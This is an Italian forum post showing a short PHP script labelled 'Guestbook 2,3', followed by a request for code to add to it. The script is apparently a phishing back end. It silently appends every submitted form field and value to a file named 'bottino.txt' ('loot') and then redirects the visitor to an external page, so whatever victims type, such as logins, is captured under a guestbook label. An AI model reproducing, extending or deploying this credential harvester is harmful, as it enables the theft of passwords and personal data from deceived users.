Codice: Seleziona tutto
<?php
/*****************************
Autore : Elle4316
Script : Guestbook 2,3
*****************************/
header ('Location:http://fred.altervista.org/commentofine.php');
$handle = fopen("bottino.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> Cosa dovrei aggiungere a questo semplice script ? quale codice?

